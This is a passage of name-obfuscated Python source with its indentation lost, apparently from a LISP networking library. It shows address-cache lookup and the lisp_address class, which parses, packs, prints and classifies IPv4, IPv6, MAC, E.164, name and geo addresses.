if 35 - 35: o0oOOo0O0Ooo % iII111i / O0 * I1IiiI . o0oOOo0O0Ooo / OOooOOo
if 81 - 81: I1ii11iIi11i - i11iIiiIii
if 49 - 49: iII111i * I11i - II111iiii . o0oOOo0O0Ooo
if 52 - 52: Ii1I + Ii1I - II111iiii . O0 + I1ii11iIi11i
if 60 - 60: i11iIiiIii + IiII
oO00Oooo0o0o0 = lisp_sites_by_eid . lookup_cache ( group , exact )
if ( oO00Oooo0o0o0 == None ) : return ( None )
if 41 - 41: I1Ii111 * o0oOOo0O0Ooo + Oo0Ooo
if 86 - 86: Ii1I / oO0o
if 40 - 40: OoO0O00 % oO0o + Oo0Ooo
if 60 - 60: II111iiii / Ii1I
if 14 - 14: iII111i - Oo0Ooo / o0oOOo0O0Ooo * oO0o / Oo0Ooo - I1IiiI
if 89 - 89: i1IIi / I1Ii111 + Ii1I - i1IIi
if 66 - 66: OoooooooOO
if 68 - 68: iII111i + I1Ii111
if 90 - 90: o0oOOo0O0Ooo
if 48 - 48: iII111i + Ii1I
if 45 - 45: oO0o / iIii1I11I1II1 % O0 % IiII % I1ii11iIi11i
if 89 - 89: OOooOOo - I1Ii111 - iII111i
if 67 - 67: oO0o
if 76 - 76: I1IiiI % I1IiiI - IiII / OoOoOO00 / I1ii11iIi11i
if 42 - 42: I1IiiI + I1ii11iIi11i + Oo0Ooo * i1IIi - II111iiii
if 15 - 15: o0oOOo0O0Ooo
if 60 - 60: I1ii11iIi11i / I1Ii111
if 13 - 13: I1Ii111
O00oOOOOoOO = oO00Oooo0o0o0 . lookup_source_cache ( eid , exact )
if ( O00oOOOOoOO ) : return ( O00oOOOOoOO )
if 52 - 52: II111iiii / OoO0O00 . Ii1I
if ( exact ) :
oO00Oooo0o0o0 = None
else :
i1II1 = oO00Oooo0o0o0 . parent_for_more_specifics
if ( i1II1 and i1II1 . accept_more_specifics ) :
if ( group . is_more_specific ( i1II1 . group ) ) : oO00Oooo0o0o0 = i1II1
if 68 - 68: iII111i
if 67 - 67: I1IiiI * I1IiiI
return ( oO00Oooo0o0o0 )
if 100 - 100: iII111i * iII111i . Oo0Ooo
if 10 - 10: Oo0Ooo % ooOoO0o * Oo0Ooo
if 48 - 48: ooOoO0o + II111iiii
if 73 - 73: II111iiii
if 63 - 63: i11iIiiIii . Oo0Ooo . OOooOOo - II111iiii
if 35 - 35: II111iiii + IiII
if 66 - 66: o0oOOo0O0Ooo % IiII
if 39 - 39: IiII
if 18 - 18: iII111i % o0oOOo0O0Ooo - i1IIi
if 53 - 53: o0oOOo0O0Ooo + IiII - ooOoO0o % i11iIiiIii - i11iIiiIii - I1Ii111
if 79 - 79: II111iiii + i11iIiiIii . OOooOOo . I11i / iIii1I11I1II1
if 62 - 62: O0
if 52 - 52: OoooooooOO . oO0o
if 38 - 38: ooOoO0o . i1IIi / iII111i + I1IiiI - II111iiii
if 21 - 21: i11iIiiIii + II111iiii - i1IIi / OoooooooOO * OOooOOo % Oo0Ooo
if 59 - 59: Ii1I
if 77 - 77: I1ii11iIi11i * Ii1I * O0 * I1IiiI % OoO0O00 - iIii1I11I1II1
if 6 - 6: i11iIiiIii . I11i - OoooooooOO
if 26 - 26: I1IiiI
if 26 - 26: IiII . Ii1I / IiII - OoO0O00 % OoO0O00
if 72 - 72: OoooooooOO * II111iiii + OoO0O00 % iIii1I11I1II1 . I1ii11iIi11i % OoooooooOO
if 19 - 19: OoOoOO00 + I1Ii111
if 19 - 19: I1ii11iIi11i / I1Ii111 + OoooooooOO - O0
if 49 - 49: I1ii11iIi11i / OoOoOO00 - I1IiiI + iII111i . OOooOOo % oO0o
if 34 - 34: OoO0O00 - I1IiiI + OoOoOO00
if 22 - 22: iIii1I11I1II1 . i1IIi . OOooOOo % Oo0Ooo - i1IIi
class lisp_address ( ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 78 - 78: I1IiiI / i1IIi % II111iiii % I1IiiI % Ii1I
if 29 - 29: i1IIi % o0oOOo0O0Ooo + OOooOOo / Oo0Ooo
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 38 - 38: IiII . I1Ii111
if 69 - 69: ooOoO0o + OoOoOO00 + II111iiii % I1Ii111 + Ii1I . ooOoO0o
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 73 - 73: I11i % I11i . ooOoO0o + OoOoOO00
if 33 - 33: i11iIiiIii . i11iIiiIii * i11iIiiIii / iIii1I11I1II1 / I1ii11iIi11i . ooOoO0o
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 11 - 11: iII111i
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 60 - 60: I1ii11iIi11i / I1Ii111
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 10 - 10: OoO0O00 * iIii1I11I1II1 / I11i % II111iiii . OoOoOO00 / I1IiiI
if 4 - 4: Oo0Ooo * o0oOOo0O0Ooo
if 45 - 45: Ii1I % OOooOOo * Ii1I - iIii1I11I1II1
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 18 - 18: I1Ii111 / Oo0Ooo % Ii1I + OoO0O00
if 69 - 69: iII111i % I1ii11iIi11i
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
IiiIIi1 = self . address
if ( ( ( IiiIIi1 & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( IiiIIi1 & 0xff000000 ) >> 24 ) == 172 ) :
iIiIi1iiII1I = ( IiiIIi1 & 0x00ff0000 ) >> 16
if ( iIiIi1iiII1I >= 16 and iIiIi1iiII1I <= 31 ) : return ( True )
if 47 - 47: Oo0Ooo . IiII * II111iiii / ooOoO0o
if ( ( ( IiiIIi1 & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 59 - 59: oO0o
if 62 - 62: O0 - i11iIiiIii % OOooOOo
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 44 - 44: I1ii11iIi11i * i1IIi - iIii1I11I1II1 - oO0o - oO0o * II111iiii
if 98 - 98: Oo0Ooo + ooOoO0o / OOooOOo . iIii1I11I1II1 . I1IiiI . OoOoOO00
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 92 - 92: i1IIi + OoOoOO00 * i1IIi / IiII
return ( 0 )
if 4 - 4: oO0o % OoO0O00 + IiII + o0oOOo0O0Ooo
if 82 - 82: O0 / I1Ii111 + OOooOOo . IiII + Ii1I
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
IiiIIi1 = self . address >> 96
return ( IiiIIi1 == 0x20010005 )
if 31 - 31: i1IIi * OoO0O00 - Ii1I + I11i
if 8 - 8: O0 + i1IIi . O0
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 67 - 67: I1IiiI
return ( 0 )
if 42 - 42: ooOoO0o - o0oOOo0O0Ooo % oO0o - ooOoO0o
if 87 - 87: OoooooooOO / O0
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 57 - 57: iIii1I11I1II1 / IiII + OoO0O00 * oO0o + Ii1I
if 76 - 76: i11iIiiIii . OOooOOo / I11i * oO0o % iIii1I11I1II1 . ooOoO0o
def packet_format ( self ) :
if 75 - 75: O0 + I1IiiI
if 67 - 67: OoOoOO00 % OoooooooOO / OoO0O00 - OoO0O00 / O0
if 19 - 19: iIii1I11I1II1 / OOooOOo % I11i % I1IiiI / I1ii11iIi11i
if 73 - 73: II111iiii
if 26 - 26: II111iiii . iIii1I11I1II1 - I1Ii111 % OOooOOo
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 83 - 83: OOooOOo + OoooooooOO % I1Ii111 % IiII + i11iIiiIii
if 10 - 10: OoooooooOO . Ii1I % I1Ii111 + IiII
def pack_address ( self ) :
O00oO00oOO00O = self . packet_format ( )
IIii1i = ""
if ( self . is_ipv4 ( ) ) :
IIii1i = struct . pack ( O00oO00oOO00O , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
Ii1iiI1i1 = byte_swap_64 ( self . address >> 64 )
iIi = byte_swap_64 ( self . address & 0xffffffffffffffff )
IIii1i = struct . pack ( O00oO00oOO00O , Ii1iiI1i1 , iIi )
elif ( self . is_mac ( ) ) :
IiiIIi1 = self . address
Ii1iiI1i1 = ( IiiIIi1 >> 32 ) & 0xffff
iIi = ( IiiIIi1 >> 16 ) & 0xffff
OOoO0OoOo = IiiIIi1 & 0xffff
IIii1i = struct . pack ( O00oO00oOO00O , Ii1iiI1i1 , iIi , OOoO0OoOo )
elif ( self . is_e164 ( ) ) :
IiiIIi1 = self . address
Ii1iiI1i1 = ( IiiIIi1 >> 32 ) & 0xffffffff
iIi = ( IiiIIi1 & 0xffffffff )
IIii1i = struct . pack ( O00oO00oOO00O , Ii1iiI1i1 , iIi )
elif ( self . is_dist_name ( ) ) :
IIii1i += self . address + "\0"
if 87 - 87: iII111i
return ( IIii1i )
if 32 - 32: OoOoOO00
if 65 - 65: iIii1I11I1II1 + iII111i
def unpack_address ( self , packet ) :
O00oO00oOO00O = self . packet_format ( )
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 90 - 90: i11iIiiIii - Oo0Ooo
IiiIIi1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 31 - 31: OoOoOO00 + OoOoOO00 + OoooooooOO % O0
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( IiiIIi1 [ 0 ] )
if 14 - 14: i1IIi / OoooooooOO . I1IiiI * I1Ii111 + OoO0O00
elif ( self . is_ipv6 ( ) ) :
if 45 - 45: OoooooooOO * I1Ii111
if 7 - 7: O0
if 42 - 42: o0oOOo0O0Ooo / Ii1I
if 31 - 31: OOooOOo
if 20 - 20: i11iIiiIii * oO0o * ooOoO0o
if 65 - 65: I1ii11iIi11i / Oo0Ooo / I1IiiI + IiII
if 71 - 71: OoO0O00 . I1Ii111 + OoooooooOO
if 9 - 9: OoooooooOO / iIii1I11I1II1 % I1IiiI . I1IiiI / I11i - iII111i
if ( IiiIIi1 [ 0 ] <= 0xffff and ( IiiIIi1 [ 0 ] & 0xff ) == 0 ) :
O0OO0OO0 = ( IiiIIi1 [ 0 ] << 48 ) << 64
else :
O0OO0OO0 = byte_swap_64 ( IiiIIi1 [ 0 ] ) << 64
if 23 - 23: OoOoOO00 % ooOoO0o
iii11Ii = byte_swap_64 ( IiiIIi1 [ 1 ] )
self . address = O0OO0OO0 | iii11Ii
if 5 - 5: o0oOOo0O0Ooo * i11iIiiIii
elif ( self . is_mac ( ) ) :
OOIIIi11i1Ii11i = IiiIIi1 [ 0 ]
O00o = IiiIIi1 [ 1 ]
iII1II = IiiIIi1 [ 2 ]
self . address = ( OOIIIi11i1Ii11i << 32 ) + ( O00o << 16 ) + iII1II
if 66 - 66: I1Ii111 - o0oOOo0O0Ooo + I11i
elif ( self . is_e164 ( ) ) :
self . address = ( IiiIIi1 [ 0 ] << 32 ) + IiiIIi1 [ 1 ]
if 1 - 1: i1IIi % oO0o . iII111i - I1Ii111 % iII111i
elif ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
ooOoooOoo0oO = 0
if 83 - 83: oO0o
packet = packet [ ooOoooOoo0oO : : ]
return ( packet )
if 42 - 42: I1ii11iIi11i . IiII . O0 / iIii1I11I1II1 - Oo0Ooo % ooOoO0o
if 98 - 98: o0oOOo0O0Ooo % I1IiiI - Oo0Ooo % o0oOOo0O0Ooo % OoooooooOO
def is_ipv4 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV4 ) else False )
if 16 - 16: I11i - Ii1I . I1ii11iIi11i % Oo0Ooo
if 7 - 7: oO0o - I11i / OoOoOO00 * I1Ii111 - Ii1I - i11iIiiIii
def is_ipv4_link_local ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 16 ) & 0xffff ) == 0xa9fe )
if 57 - 57: IiII % i1IIi
if 74 - 74: iII111i % I11i * i11iIiiIii . i11iIiiIii + iIii1I11I1II1 * i1IIi
def is_ipv4_loopback ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( self . address == 0x7f000001 )
if 53 - 53: I1ii11iIi11i + IiII / OOooOOo . OoooooooOO - ooOoO0o
if 47 - 47: i11iIiiIii
def is_ipv4_multicast ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
return ( ( ( self . address >> 24 ) & 0xf0 ) == 0xe0 )
if 21 - 21: i1IIi - oO0o - Oo0Ooo
if 11 - 11: i1IIi
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
if 56 - 56: I1Ii111 * i1IIi % i11iIiiIii
def is_ipv6 ( self ) :
return ( True if ( self . afi == LISP_AFI_IPV6 ) else False )
if 56 - 56: Ii1I . iII111i
if 76 - 76: I1IiiI / Ii1I % OoOoOO00 + IiII / i11iIiiIii . o0oOOo0O0Ooo
def is_ipv6_link_local ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 112 ) & 0xffff ) == 0xfe80 )
if 31 - 31: oO0o * oO0o % o0oOOo0O0Ooo . O0 + iII111i
if 52 - 52: i11iIiiIii
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 1 - 1: i1IIi * iIii1I11I1II1
if 29 - 29: I11i
def is_ipv6_loopback ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( self . address == 1 )
if 12 - 12: oO0o % i1IIi - oO0o / ooOoO0o * II111iiii % ooOoO0o
if 6 - 6: IiII / OoO0O00
def is_ipv6_multicast ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
return ( ( ( self . address >> 120 ) & 0xff ) == 0xff )
if 83 - 83: IiII - iIii1I11I1II1 * ooOoO0o - oO0o
if 77 - 77: Ii1I
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 9 - 9: OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
def is_mac ( self ) :
return ( True if ( self . afi == LISP_AFI_MAC ) else False )
if 20 - 20: I1Ii111
if 33 - 33: i11iIiiIii / I1Ii111 + IiII / II111iiii + I11i
def is_mac_multicast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( ( self . address & 0x010000000000 ) != 0 )
if 13 - 13: i1IIi % iII111i + OoOoOO00 / Ii1I . Ii1I + II111iiii
if 44 - 44: OoOoOO00 / OoooooooOO % O0 * Ii1I * IiII
def is_mac_broadcast ( self ) :
if ( self . is_mac ( ) == False ) : return ( False )
return ( self . address == 0xffffffffffff )
if 84 - 84: o0oOOo0O0Ooo * IiII * OOooOOo * iII111i
if 56 - 56: iII111i * II111iiii . OoooooooOO . I11i
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 25 - 25: ooOoO0o % o0oOOo0O0Ooo - i11iIiiIii
if 79 - 79: iII111i - I1IiiI % O0 / Oo0Ooo + OoOoOO00 . Oo0Ooo
def is_link_local_multicast ( self ) :
if ( self . is_ipv4 ( ) ) :
return ( ( 0xe0ffff00 & self . address ) == 0xe0000000 )
if 59 - 59: I1ii11iIi11i * OoOoOO00 / Ii1I
if ( self . is_ipv6 ( ) ) :
return ( ( self . address >> 112 ) & 0xffff == 0xff02 )
if 80 - 80: IiII - ooOoO0o / OoOoOO00 / I11i * O0 + oO0o
return ( False )
if 77 - 77: ooOoO0o + I1ii11iIi11i * o0oOOo0O0Ooo / i1IIi * I11i
if 70 - 70: oO0o / iII111i * i1IIi / II111iiii / OoOoOO00 + oO0o
def is_null ( self ) :
return ( True if ( self . afi == LISP_AFI_NONE ) else False )
if 30 - 30: i1IIi - iII111i - i11iIiiIii . OoOoOO00 . o0oOOo0O0Ooo
if 74 - 74: i11iIiiIii / II111iiii
def is_ultimate_root ( self ) :
return ( True if self . afi == LISP_AFI_ULTIMATE_ROOT else False )
if 62 - 62: O0
if 63 - 63: Oo0Ooo + Oo0Ooo
def is_iid_range ( self ) :
return ( True if self . afi == LISP_AFI_IID_RANGE else False )
if 48 - 48: Oo0Ooo * I1ii11iIi11i % II111iiii
if 42 - 42: I1Ii111 - ooOoO0o % o0oOOo0O0Ooo * I1IiiI . o0oOOo0O0Ooo
def is_e164 ( self ) :
return ( True if ( self . afi == LISP_AFI_E164 ) else False )
if 84 - 84: iIii1I11I1II1
if 39 - 39: Ii1I . II111iiii / I1IiiI
def is_dist_name ( self ) :
return ( True if ( self . afi == LISP_AFI_NAME ) else False )
if 44 - 44: Ii1I / Ii1I / OoO0O00 % ooOoO0o / I11i . I1ii11iIi11i
if 41 - 41: I1ii11iIi11i * ooOoO0o * I11i + O0 * O0 - O0
def is_geo_prefix ( self ) :
return ( True if ( self . afi == LISP_AFI_GEO_COORD ) else False )
if 81 - 81: I1Ii111 % OoO0O00 / O0
if 55 - 55: i1IIi - I1Ii111 + I11i
def is_binary ( self ) :
if ( self . is_dist_name ( ) ) : return ( False )
if ( self . is_geo_prefix ( ) ) : return ( False )
return ( True )
if 93 - 93: I1IiiI % IiII . OoOoOO00 + iII111i
if 81 - 81: ooOoO0o / I1Ii111 + OOooOOo / Oo0Ooo / OoOoOO00
def store_address ( self , addr_str ) :
if ( self . afi == LISP_AFI_NONE ) : self . string_to_afi ( addr_str )
if 34 - 34: ooOoO0o * iIii1I11I1II1 % i11iIiiIii * OOooOOo - OOooOOo
if 63 - 63: Oo0Ooo / oO0o + iII111i % OoooooooOO * I11i
if 34 - 34: I1IiiI + I1Ii111 % ooOoO0o
if 24 - 24: Ii1I % II111iiii - i11iIiiIii
IiIIi1IiiIiI = addr_str . find ( "[" )
oOoOoO0O = addr_str . find ( "]" )
if ( IiIIi1IiiIiI != - 1 and oOoOoO0O != - 1 ) :
self . instance_id = int ( addr_str [ IiIIi1IiiIiI + 1 : oOoOoO0O ] )
addr_str = addr_str [ oOoOoO0O + 1 : : ]
if ( self . is_dist_name ( ) == False ) :
addr_str = addr_str . replace ( " " , "" )
if 52 - 52: OoO0O00
if 76 - 76: ooOoO0o - iII111i % ooOoO0o / oO0o . OOooOOo
if 50 - 50: IiII . i11iIiiIii % I11i
if 22 - 22: i1IIi - II111iiii - OoOoOO00 . iII111i
if 43 - 43: I1Ii111 * OOooOOo - IiII . i11iIiiIii
if 34 - 34: iII111i . OoOoOO00
if ( self . is_ipv4 ( ) ) :
IIIIi11IiiI = addr_str . split ( "." )
i11II = int ( IIIIi11IiiI [ 0 ] ) << 24
i11II += int ( IIIIi11IiiI [ 1 ] ) << 16
i11II += int ( IIIIi11IiiI [ 2 ] ) << 8
i11II += int ( IIIIi11IiiI [ 3 ] )
self . address = i11II
elif ( self . is_ipv6 ( ) ) :
if 7 - 7: iIii1I11I1II1 - Ii1I % II111iiii + Ii1I
if 19 - 19: I1ii11iIi11i
if 95 - 95: I11i
if 39 - 39: IiII * I11i + I1IiiI
if 60 - 60: I11i % Ii1I * oO0o % II111iiii + o0oOOo0O0Ooo
if 62 - 62: O0 - O0 - I1IiiI . OoO0O00 . i11iIiiIii % i11iIiiIii
if 54 - 54: I1IiiI + OoooooooOO / iII111i / I11i . I11i % I11i
if 54 - 54: OoO0O00 * I11i * iIii1I11I1II1 * IiII
if 12 - 12: O0 - iII111i * IiII . i11iIiiIii
if 25 - 25: Ii1I % i1IIi * I11i * Ii1I - IiII . i11iIiiIii
if 40 - 40: OOooOOo - OoooooooOO
if 36 - 36: i1IIi % OoOoOO00 - i1IIi
if 5 - 5: I1IiiI . I1IiiI % II111iiii - I1Ii111
if 97 - 97: I11i . ooOoO0o
if 87 - 87: oO0o / iIii1I11I1II1 - I11i + OoooooooOO
if 79 - 79: I1ii11iIi11i * IiII . I1ii11iIi11i
if 65 - 65: iII111i - Ii1I - II111iiii * O0 + I1ii11iIi11i . iIii1I11I1II1
oO0o0oo0OoOO = ( addr_str [ 2 : 4 ] == "::" )
try :
addr_str = socket . inet_pton ( socket . AF_INET6 , addr_str )
except :
addr_str = socket . inet_pton ( socket . AF_INET6 , "0::0" )
if 76 - 76: I1IiiI * iII111i . II111iiii % OoO0O00 . Ii1I * OOooOOo
addr_str = binascii . hexlify ( addr_str )
if 5 - 5: IiII % OoO0O00 + I1Ii111 % OoooooooOO / o0oOOo0O0Ooo + OoooooooOO
if ( oO0o0oo0OoOO ) :
addr_str = addr_str [ 2 : 4 ] + addr_str [ 0 : 2 ] + addr_str [ 4 : : ]
if 93 - 93: I1IiiI % OoOoOO00
self . address = int ( addr_str , 16 )
if 12 - 12: Oo0Ooo + I11i
elif ( self . is_geo_prefix ( ) ) :
iiIi1ii1IiI = lisp_geo ( None )
iiIi1ii1IiI . name = "geo-prefix-{}" . format ( iiIi1ii1IiI )
iiIi1ii1IiI . parse_geo_string ( addr_str )
self . address = iiIi1ii1IiI
elif ( self . is_mac ( ) ) :
addr_str = addr_str . replace ( "-" , "" )
i11II = int ( addr_str , 16 )
self . address = i11II
elif ( self . is_e164 ( ) ) :
addr_str = addr_str [ 1 : : ]
i11II = int ( addr_str , 16 )
self . address = i11II << 4
elif ( self . is_dist_name ( ) ) :
self . address = addr_str . replace ( "'" , "" )
if 97 - 97: OOooOOo / IiII / ooOoO0o / OoooooooOO
self . mask_len = self . host_mask_len ( )
if 78 - 78: I1Ii111 + I1Ii111
if 43 - 43: I1Ii111 * o0oOOo0O0Ooo + i1IIi
def store_prefix ( self , prefix_str ) :
if ( self . is_geo_string ( prefix_str ) ) :
ooo = prefix_str . find ( "]" )
iIi1iii1 = len ( prefix_str [ ooo + 1 : : ] ) * 8
elif ( prefix_str . find ( "/" ) != - 1 ) :
prefix_str , iIi1iii1 = prefix_str . split ( "/" )
else :
i1i = prefix_str . find ( "'" )
if ( i1i == - 1 ) : return
O0ooOo0 = prefix_str . find ( "'" , i1i + 1 )
if ( O0ooOo0 == - 1 ) : return
iIi1iii1 = len ( prefix_str [ i1i + 1 : O0ooOo0 ] ) * 8
if 19 - 19: Ii1I
if 51 - 51: oO0o
self . string_to_afi ( prefix_str )
self . store_address ( prefix_str )
self . mask_len = int ( iIi1iii1 )
if 57 - 57: i11iIiiIii - Oo0Ooo + I1Ii111 * OoO0O00
if 35 - 35: o0oOOo0O0Ooo % II111iiii + O0
def zero_host_bits ( self ) :
if ( self . mask_len < 0 ) : return
oOoo00oOoO0o = ( 2 ** self . mask_len ) - 1
IIiIiII = self . addr_length ( ) * 8 - self . mask_len
oOoo00oOoO0o <<= IIiIiII
self . address &= oOoo00oOoO0o
if 49 - 49: Ii1I * I1ii11iIi11i
if 66 - 66: ooOoO0o
def is_geo_string ( self , addr_str ) :
ooo = addr_str . find ( "]" )
if ( ooo != - 1 ) : addr_str = addr_str [ ooo + 1 : : ]
if 2 - 2: o0oOOo0O0Ooo
iiIi1ii1IiI = addr_str . split ( "/" )
if ( len ( iiIi1ii1IiI ) == 2 ) :
if ( iiIi1ii1IiI [ 1 ] . isdigit ( ) == False ) : return ( False )
if 86 - 86: OoooooooOO * I1ii11iIi11i + O0 + o0oOOo0O0Ooo + OOooOOo % OoO0O00
iiIi1ii1IiI = iiIi1ii1IiI [ 0 ]
iiIi1ii1IiI = iiIi1ii1IiI . split ( "-" )
o0o0O0O0Oooo0 = len ( iiIi1ii1IiI )
if ( o0o0O0O0Oooo0 < 8 or o0o0O0O0Oooo0 > 9 ) : return ( False )
if 34 - 34: I1IiiI + i1IIi . II111iiii . O0
for OOOi1II11i111 in range ( 0 , o0o0O0O0Oooo0 ) :
if ( OOOi1II11i111 == 3 ) :
if ( iiIi1ii1IiI [ OOOi1II11i111 ] in [ "N" , "S" ] ) : continue
return ( False )
if 11 - 11: Ii1I
if ( OOOi1II11i111 == 7 ) :
if ( iiIi1ii1IiI [ OOOi1II11i111 ] in [ "W" , "E" ] ) : continue
return ( False )
if 35 - 35: i11iIiiIii + ooOoO0o
if ( iiIi1ii1IiI [ OOOi1II11i111 ] . isdigit ( ) == False ) : return ( False )
if 82 - 82: OoooooooOO % O0 + iIii1I11I1II1
return ( True )
if 100 - 100: OoooooooOO + I11i - OoOoOO00 + Ii1I + I1Ii111 * iIii1I11I1II1
if 55 - 55: I1Ii111
def string_to_afi ( self , addr_str ) :
if ( addr_str . count ( "'" ) == 2 ) :
self . afi = LISP_AFI_NAME
return
if 18 - 18: iIii1I11I1II1 + O0 / iIii1I11I1II1 . oO0o % O0
if ( addr_str . find ( ":" ) != - 1 ) : self . afi = LISP_AFI_IPV6
elif ( addr_str . find ( "." ) != - 1 ) : self . afi = LISP_AFI_IPV4
elif ( addr_str . find ( "+" ) != - 1 ) : self . afi = LISP_AFI_E164
elif ( self . is_geo_string ( addr_str ) ) : self . afi = LISP_AFI_GEO_COORD
elif ( addr_str . find ( "-" ) != - 1 ) : self . afi = LISP_AFI_MAC
else : self . afi = LISP_AFI_NONE
if 72 - 72: ooOoO0o / IiII / OOooOOo + OOooOOo / I1ii11iIi11i / i1IIi
if 61 - 61: I11i * O0
def print_address ( self ) :
IiiIIi1 = self . print_address_no_iid ( )
o0OoO0000o = "[" + str ( self . instance_id )
for IiIIi1IiiIiI in self . iid_list : o0OoO0000o += "," + str ( IiIIi1IiiIiI )
o0OoO0000o += "]"
IiiIIi1 = "{}{}" . format ( o0OoO0000o , IiiIIi1 )
return ( IiiIIi1 )
if 80 - 80: I1ii11iIi11i + II111iiii % Oo0Ooo - o0oOOo0O0Ooo
if 1 - 1: iII111i - OoOoOO00
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
IiiIIi1 = self . address
IiiIiiI = IiiIIi1 >> 24
Ii1II = ( IiiIIi1 >> 16 ) & 0xff
OoIIiiI1II = ( IiiIIi1 >> 8 ) & 0xff
OOOoo0O0 = IiiIIi1 & 0xff
return ( "{}.{}.{}.{}" . format ( IiiIiiI , Ii1II , OoIIiiI1II , OOOoo0O0 ) )
elif ( self . is_ipv6 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 32 )
oo0o00OO = binascii . unhexlify ( oo0o00OO )
oo0o00OO = socket . inet_ntop ( socket . AF_INET6 , oo0o00OO )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 12 )
oo0o00OO = "{}-{}-{}" . format ( oo0o00OO [ 0 : 4 ] , oo0o00OO [ 4 : 8 ] ,
oo0o00OO [ 8 : 12 ] )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_e164 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( oo0o00OO ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 25 - 25: o0oOOo0O0Ooo
return ( "unknown-afi:{}" . format ( self . afi ) )
if 29 - 29: I1Ii111
if 58 - 58: i1IIi / I1ii11iIi11i
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
